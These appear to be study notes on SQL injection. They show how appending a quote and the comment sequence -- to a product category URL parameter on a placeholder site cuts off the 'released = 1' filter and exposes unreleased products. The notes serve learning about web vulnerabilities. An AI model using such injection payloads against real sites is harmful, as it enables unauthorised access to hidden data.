Retrieving Hidden Data
Target URL: https://insecure-website.com/products?category=Gifts
SELECT * FROM products WHERE category = 'Gifts' AND released = 1
Exploit URL: https://insecure-website.com/products?category=Gifts'--
SELECT * FROM products WHERE category = 'Gifts'--' AND released = 1
- -- is a comment indicator in SQL, so the rest of the query (AND released = 1) is ignored
As a result, all products are displayed, including unreleased products